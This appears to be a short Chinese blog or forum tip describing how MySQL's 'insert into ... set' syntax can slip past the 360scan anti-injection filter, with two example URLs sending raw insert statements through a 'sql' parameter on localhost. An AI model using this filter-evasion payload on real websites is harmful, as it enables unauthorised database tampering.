Mysql语法绕过360scan insert防注入

其实Mysql不只可以用insert into xxx values 插入数据,还可以:insert into xxx set xx = 
1,
  1. http://localhost/360.php?sql=insert into user (user,pass)values('admin','123456')
 

2,
  1. http://localhost/360.php?sql=insert into user set user='admin',pass='123456'